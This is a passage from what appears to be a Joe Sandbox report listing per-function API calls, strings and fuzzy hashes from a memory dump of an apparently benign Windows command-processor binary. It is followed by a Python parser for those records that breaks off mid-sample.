                                                                                          • Instruction Fuzzy Hash: 9151BB72B0A683AAEB208F25D8402B977A0FF49B94F444035DE5D87795EF3CE545E700
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: iswdigit
                                                                                          • String ID: GeToken: (%x) '%s'
                                                                                          • API String ID: 3849470556-1994581435
                                                                                          • Opcode ID: b1c74980886186fc2843b8190b4a082341e47de456d20d62b3525a594f11c7d8
                                                                                          • Instruction ID: 8d58de1d829397e171e2d0b85088e34453f0522851ea5e81835cf8a60dc855ed
                                                                                          • Opcode Fuzzy Hash: b1c74980886186fc2843b8190b4a082341e47de456d20d62b3525a594f11c7d8
                                                                                          • Instruction Fuzzy Hash: 0B51CA32A0A643A5EB209F26E4542797BA0FF48B54F148435DA5DC33D2EF7DE884E340
                                                                                          APIs
                                                                                          • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF6A0E99A10
                                                                                          • RegEnumKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF6A0E99994
                                                                                            • Part of subcall function 00007FF6A0E9A73C: RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF6A0E99A82), ref: 00007FF6A0E9A77A
                                                                                            • Part of subcall function 00007FF6A0E9A73C: SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF6A0E99A82), ref: 00007FF6A0E9A839
                                                                                            • Part of subcall function 00007FF6A0E9A73C: RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF6A0E99A82), ref: 00007FF6A0E9A850
                                                                                          • wcsrchr.MSVCRT ref: 00007FF6A0E99A62
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: ErrorLast$CloseEnumOpenwcsrchr
                                                                                          • String ID: %s=%s$.
                                                                                          • API String ID: 3242694432-4275322459
                                                                                          • Opcode ID: f0a6781f902405e6d501dc5d40a6bf5070585413eea37f1d1ba285c718ededde
                                                                                          • Instruction ID: 30fe13a936300f9ac9354573f3f1798ccdbae0d6222f04303688f826b2fe38c1
                                                                                          • Opcode Fuzzy Hash: f0a6781f902405e6d501dc5d40a6bf5070585413eea37f1d1ba285c718ededde
                                                                                          • Instruction Fuzzy Hash: 4741B431B0F743A6FE109B65A4502BAA2A1FF897E0F544234DE5D877D6EE7CE845A300
                                                                                          APIs
                                                                                          • GetCurrentProcessId.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00007FF6A0E954E6
                                                                                          • CreateMutexExW.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00007FF6A0E9552E
                                                                                            • Part of subcall function 00007FF6A0E9758C: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,00000000,00007FF6A0E96999,?,?,?,?,?,00007FF6A0E88C39), ref: 00007FF6A0E975AE
                                                                                            • Part of subcall function 00007FF6A0E9758C: SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,00000000,00007FF6A0E96999,?,?,?,?,?,00007FF6A0E88C39), ref: 00007FF6A0E975C6
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: ErrorLast$CreateCurrentMutexProcess
                                                                                          • String ID: Local\SM0:%d:%d:%hs$wil$x
                                                                                          • API String ID: 779401067-630742106
                                                                                          • Opcode ID: 455202d7a479b8eb008443c79237f92c22bbe4b1cb8e523106a0b0b2338ac627
                                                                                          • Instruction ID: 7096df032cd786a79a9dc46345a1f0cdf5c75a8b7a24cc8a364180b8f9a729d7
                                                                                          • Opcode Fuzzy Hash: 455202d7a479b8eb008443c79237f92c22bbe4b1cb8e523106a0b0b2338ac627
                                                                                          • Instruction Fuzzy Hash: 98517173A19683A2EB219B25E4407FAA361FF887C4F554032EA4DCBB56DE7CD505D700
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentDirectorytowupper
                                                                                          • String ID: :$:
                                                                                          • API String ID: 238703822-3780739392
                                                                                          • Opcode ID: dcf03791281f7c84e6b05e0af004632f1679b3806237a1a98edf480c5c28324e
                                                                                          • Instruction ID: 9d9a1b67c2931cd473b2193f9dffb7614a01e9b4999d71b81f983902e503c8a5
                                                                                          • Opcode Fuzzy Hash: dcf03791281f7c84e6b05e0af004632f1679b3806237a1a98edf480c5c28324e
                                                                                          • Instruction Fuzzy Hash: 0C11277260A742A5EB258B71E805279F6E0FF4D79AF458132EE0D87790DF3CD145A704
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                           • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmp
                                                                                           • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmp
                                                                                           • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmp
                                                                                           • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmp
                                                                                           • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmp
                                                                                           • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: CloseOpenQueryValue
                                                                                          • String ID: Software\Microsoft\Windows NT\CurrentVersion$UBR
                                                                                          • API String ID: 3677997916-3870813718
                                                                                          • Opcode ID: e374f3dcbd9129e05b114749def04da8ffc7e52e41f89dc762ae3dbe31e9aca9
                                                                                          • Instruction ID: 5a6c6394205858ed0fc8defdedc4c3d960cd045505d46bff63a1fdcc3706906f
                                                                                          • Opcode Fuzzy Hash: e374f3dcbd9129e05b114749def04da8ffc7e52e41f89dc762ae3dbe31e9aca9
                                                                                          • Instruction Fuzzy Hash: 15114C7261AB42D7EB108B10E44026AF7B0FBC9765F504235EB8D42B68DFBCD048DB00
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                           • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmp
                                                                                           • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmp
                                                                                           • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmp
                                                                                           • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmp
                                                                                           • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmp
                                                                                           • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: memsetwcsrchr$wcschr
                                                                                          • String ID:
                                                                                          • API String ID: 110935159-0
                                                                                          • Opcode ID: c69a388bc8b3a3ff16e2786c96b1100a2dbfc28b8c9e9179231870a23454a700
                                                                                          • Instruction ID: e5fab3fd3caa073cc9d4cb668299ca2f2758648ae8c8891b4c8d3f38b9030635
                                                                                          • Opcode Fuzzy Hash: c69a388bc8b3a3ff16e2786c96b1100a2dbfc28b8c9e9179231870a23454a700
                                                                                          • Instruction Fuzzy Hash: 1951B072B0B683A5FE319B11A8047F9A291BB49BA4F184534CE5E8B785DF3CE546A300
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                           • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmp
                                                                                           • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmp
                                                                                           • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmp
                                                                                           • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmp
                                                                                           • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmp
                                                                                           • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: memset$CurrentDirectorytowupper
                                                                                          • String ID:
                                                                                          • API String ID: 1403193329-0
                                                                                          • Opcode ID: 8d3f1f6d42ab2b17ec89b1c571636d09bda29dc00517b4cae09e24a64d59b58f
                                                                                          • Instruction ID: d2a51a360fa4b86f2939bfb556c3012587543bc9dc4d31c1a05038be9518c96e
                                                                                          • Opcode Fuzzy Hash: 8d3f1f6d42ab2b17ec89b1c571636d09bda29dc00517b4cae09e24a64d59b58f
                                                                                          • Instruction Fuzzy Hash: 9E51A036A0B683A5EB359F20D9046BA77A0FF49799F458135DA0E87794EF3CD548A300
                                                                                          APIs
                                                                                          • memset.MSVCRT ref: 00007FF6A0E7921C
                                                                                          • ??_V@YAXPEAX@Z.MSVCRT ref: 00007FF6A0E793AA
                                                                                            • Part of subcall function 00007FF6A0E78B20: wcsrchr.MSVCRT ref: 00007FF6A0E78BAB
                                                                                            • Part of subcall function 00007FF6A0E78B20: _wcsicmp.MSVCRT ref: 00007FF6A0E78BD4
                                                                                            • Part of subcall function 00007FF6A0E78B20: _wcsicmp.MSVCRT ref: 00007FF6A0E78BF2
                                                                                            • Part of subcall function 00007FF6A0E78B20: GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF6A0E78C16
                                                                                            • Part of subcall function 00007FF6A0E78B20: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF6A0E78C2F
                                                                                            • Part of subcall function 00007FF6A0E78B20: wcschr.MSVCRT ref: 00007FF6A0E78CB3
                                                                                            • Part of subcall function 00007FF6A0E8417C: GetCurrentDirectoryW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF6A0E841AD
                                                                                            • Part of subcall function 00007FF6A0E83060: SetErrorMode.KERNELBASE(00000000,00000000,0000000A,00007FF6A0E792AC), ref: 00007FF6A0E830CA
                                                                                            • Part of subcall function 00007FF6A0E83060: SetErrorMode.KERNELBASE ref: 00007FF6A0E830DD
                                                                                            • Part of subcall function 00007FF6A0E83060: GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF6A0E830F6
                                                                                            • Part of subcall function 00007FF6A0E83060: SetErrorMode.KERNELBASE ref: 00007FF6A0E83106
                                                                                          • wcsrchr.MSVCRT ref: 00007FF6A0E792D8
                                                                                          • GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF6A0E79362
                                                                                          • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF6A0E79373
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                           • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmp
                                                                                           • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmp
                                                                                           • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmp
                                                                                           • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmp
                                                                                           • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmp
                                                                                           • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: Error$Mode$AttributesFileLast_wcsicmpmemsetwcsrchr$CurrentDirectoryFullNamePathwcschr
                                                                                          • String ID:
                                                                                          • API String ID: 3966000956-0
                                                                                          • Opcode ID: 183dd49cd64c4b512f254b2111cbb7598a172917c7dc1c37f5ad0fa1295e0e26
                                                                                          • Instruction ID: ccd7cafef9c02098fd72ad3f03de88393f2d586589c48a52a10c5fc60daa8822
                                                                                          • Opcode Fuzzy Hash: 183dd49cd64c4b512f254b2111cbb7598a172917c7dc1c37f5ad0fa1295e0e26
                                                                                          • Instruction Fuzzy Hash: 7151A132A0B783AAEB619F21D8502B973A4FF49B94F144035DA4D87B96DF3CE555E300
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                           • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmp
                                                                                           • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmp
                                                                                           • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmp
                                                                                           • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmp
                                                                                           • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmp
                                                                                           • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: memset$_setjmp
                                                                                          • String ID:
                                                                                          • API String ID: 3883041866-0
                                                                                          • Opcode ID: ecc4c4b8fdff3fe7128d071ff51470f6781c2868d41e5204ec9995c2413b862b
                                                                                          • Instruction ID: 0d8a7926be7279bdd5d7f1818692bd8a66d0eab3a288a87ff977f10a7a513f45
                                                                                          • Opcode Fuzzy Hash: ecc4c4b8fdff3fe7128d071ff51470f6781c2868d41e5204ec9995c2413b862b
                                                                                          • Instruction Fuzzy Hash: 04516D32A0AB869AEB61CF21D8403E977A4FB49748F444139EA4D8BB49DF3CD645DB00
                                                                                          APIs
                                                                                          • _wcsicmp.MSVCRT ref: 00007FF6A0E7B4BD
                                                                                            • Part of subcall function 00007FF6A0E806C0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF6A0E7B4DB), ref: 00007FF6A0E806D6
                                                                                            • Part of subcall function 00007FF6A0E806C0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF6A0E7B4DB), ref: 00007FF6A0E806F0
                                                                                            • Part of subcall function 00007FF6A0E806C0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF6A0E7B4DB), ref: 00007FF6A0E8074D
                                                                                            • Part of subcall function 00007FF6A0E806C0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF6A0E7B4DB), ref: 00007FF6A0E80762
                                                                                          • _wcsicmp.MSVCRT ref: 00007FF6A0E7B518
                                                                                          • _wcsicmp.MSVCRT ref: 00007FF6A0E7B58B
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                           • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmp
                                                                                           • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmp
                                                                                           • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmp
                                                                                           • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmp
                                                                                           • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmp
                                                                                           • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: Heap$_wcsicmp$AllocProcess
                                                                                          • String ID: ELSE$IF/?
                                                                                          • API String ID: 3223794493-1134991328
                                                                                          • Opcode ID: 423616b0ad94ea500b20ba8b377132b2965d659a86947a17f8aec48fbfe776c9
                                                                                          • Instruction ID: 6d07e5ec26f0e948247bc3f55be31a62e5124243e07994cfb08cd53f3b3c0eaa
                                                                                          • Opcode Fuzzy Hash: 423616b0ad94ea500b20ba8b377132b2965d659a86947a17f8aec48fbfe776c9
                                                                                          • Instruction Fuzzy Hash: 0E415A72E0F643A2FB549B64A4113B927A2BF85740F588039D64EC7397EF3CE845A340
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                           • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmp
                                                                                           • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmp
                                                                                           • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmp
                                                                                           • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmp
                                                                                           • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmp
                                                                                           • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: memset$File_get_osfhandle$PointerReadlongjmp
                                                                                          • String ID:
                                                                                          • API String ID: 1532185241-0
                                                                                          • Opcode ID: 771aa78906e2d4e00bf09d1751668696db7999ff0f41d10bb5d7c13c5b4464d7
                                                                                          • Instruction ID: 3b5fb246aafcf3f61f998673f239f40e879a90f0fdccec95e182c7277ad6c4ba
                                                                                          • Opcode Fuzzy Hash: 771aa78906e2d4e00bf09d1751668696db7999ff0f41d10bb5d7c13c5b4464d7
                                                                                          • Instruction Fuzzy Hash: 2B411532A06753ABE7649B31E44567DBAA1FB88B80F558535EB1A83791CF3CE841D700
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                           • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmp
                                                                                           • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmp
                                                                                           • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmp
                                                                                           • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmp
                                                                                           • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmp
                                                                                           • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: ErrorFileLast$DeleteRead_get_osfhandle
                                                                                          • String ID:
                                                                                          • API String ID: 3588551418-0
                                                                                          • Opcode ID: 7b3e9ef8f9e00def7e0f555f85ef5a51875302e682b222ee2a1690b22849d021
                                                                                          • Instruction ID: f59d6fff6fe63e695b56413f9c5fd94fe306411c974648683793462d2176acd6
                                                                                          • Opcode Fuzzy Hash: 7b3e9ef8f9e00def7e0f555f85ef5a51875302e682b222ee2a1690b22849d021
                                                                                          • Instruction Fuzzy Hash: C9417132E0A643EBE7549B51A48427DB661FF85B81F148039D64EC7792CF7CE841A740
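To pivot on the API IDs, Opcode IDs and fuzzy hashes in these per-function records across reports, an analyst first needs them in structured form. The parser below is an added example written for this page, not Joe Sandbox's own tooling. Its sample input is an excerpt copied from the records above (some bullets omitted, plus a deliberately truncated final block). The block boundaries it relies on (a block opens at an "APIs" heading and closes at its "Instruction Fuzzy Hash" bullet) and the handling of the "Download File" link text fused onto the "Associated" lines are assumptions taken from this page's layout, not a documented Joe Sandbox format.

```python
"""Parser for the per-function records above ('APIs' ... 'Similarity' blocks),
so IDs and fuzzy hashes can be pivoted across Joe Sandbox reports.
Added example for this page, not Joe Sandbox code. Assumed from the layout
above: a block opens at an 'APIs' heading and closes at its 'Instruction
Fuzzy Hash' bullet; 'Download File' link text is fused onto 'Associated' lines."""
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional

LABELS = {"API ID", "String ID", "API String ID", "Opcode ID", "Instruction ID",
          "Opcode Fuzzy Hash", "Instruction Fuzzy Hash", "Snapshot File"}
LABEL_RE = re.compile(r"^([A-Za-z ]+?):\s?(.*)$")
SOURCE_RE = re.compile(r"^Source File: (\S+), Offset: ([0-9A-Fa-f]+), based on PE: (true|false)")
ASSOC_RE = re.compile(r"^Associated: (\S+?\.sdmp)")  # stops before the fused 'Download File'
APIREF_RE = re.compile(
    r"^(?:Part of subcall function ([0-9A-Fa-f]+): )?"  # call sits inside a callee
    r"([^.\s]+)\.([^(\s,]+)"                           # api.module
    r"(?:\(([^)]*)\))?,? ref: ([0-9A-Fa-f]+)$")        # optional args, call-site address

@dataclass
class ApiRef:
    api: str
    module: str
    ref: str                        # address of the call instruction
    subcall: Optional[str] = None   # callee address when reached via a subcall
    args: Optional[str] = None

@dataclass
class FunctionRecord:
    ids: Dict[str, str] = field(default_factory=dict)  # keyed by the report's own labels
    source_file: str = ""
    offset: str = ""
    based_on_pe: Optional[bool] = None
    associated: List[str] = field(default_factory=list)
    api_refs: List[ApiRef] = field(default_factory=list)
    unparsed: List[str] = field(default_factory=list)  # bullets in a shape not handled here

def parse_records(text: str) -> List[FunctionRecord]:
    """Return every complete record in `text`; a truncated trailing block is dropped."""
    records: List[FunctionRecord] = []
    cur: Optional[FunctionRecord] = None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":                      # first heading of each function block
            cur = FunctionRecord()
            continue
        if cur is None or not line.startswith("•"):
            continue                            # other headings and blank lines
        body = line.lstrip("•").strip()
        if m := SOURCE_RE.match(body):
            cur.source_file, cur.offset = m.group(1), m.group(2)
            cur.based_on_pe = m.group(3) == "true"
        elif m := ASSOC_RE.match(body):
            cur.associated.append(m.group(1))
        elif (m := LABEL_RE.match(body)) and m.group(1) in LABELS:
            cur.ids[m.group(1)] = m.group(2).strip()
            if m.group(1) == "Instruction Fuzzy Hash":   # last bullet of a block
                records.append(cur)
                cur = None
        elif m := APIREF_RE.match(body):
            cur.api_refs.append(ApiRef(m.group(2), m.group(3), m.group(5), m.group(1), m.group(4)))
        else:
            cur.unparsed.append(body)
    return records

def functions_calling(records, api_name, include_subcalls=True):
    """Records that reference `api_name`, directly or (optionally) through a callee."""
    return [r for r in records if any(
        x.api == api_name and (include_subcalls or x.subcall is None) for x in r.api_refs)]

def opcode_hash_mismatches(records) -> List[str]:
    """Opcode IDs whose block shows a different Opcode Fuzzy Hash (none in this report)."""
    return [r.ids["Opcode ID"] for r in records if r.ids["Opcode ID"] != r.ids["Opcode Fuzzy Hash"]]

# Excerpt copied from the records above (some bullets omitted), plus a truncated tail block.
SAMPLE = """\
APIs
• memset.MSVCRT ref: 00007FF6A0E7921C
  • Part of subcall function 00007FF6A0E83060: SetErrorMode.KERNELBASE(00000000,00000000,0000000A,00007FF6A0E792AC), ref: 00007FF6A0E830CA
• GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF6A0E79362
• GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF6A0E79373
Memory Dump Source
• Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
• Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmpDownload File
• Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
Similarity
• API ID: Error$Mode$AttributesFileLast_wcsicmpmemsetwcsrchr$CurrentDirectoryFullNamePathwcschr
• String ID:
• API String ID: 3966000956-0
• Opcode ID: 183dd49cd64c4b512f254b2111cbb7598a172917c7dc1c37f5ad0fa1295e0e26
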